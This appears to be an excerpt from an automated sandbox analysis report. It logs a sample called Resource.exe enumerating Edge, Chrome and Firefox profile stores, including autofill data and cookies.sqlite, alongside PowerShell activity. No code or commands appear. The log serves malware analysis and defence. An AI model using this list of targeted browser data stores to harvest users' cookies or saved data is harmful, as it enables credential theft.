Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
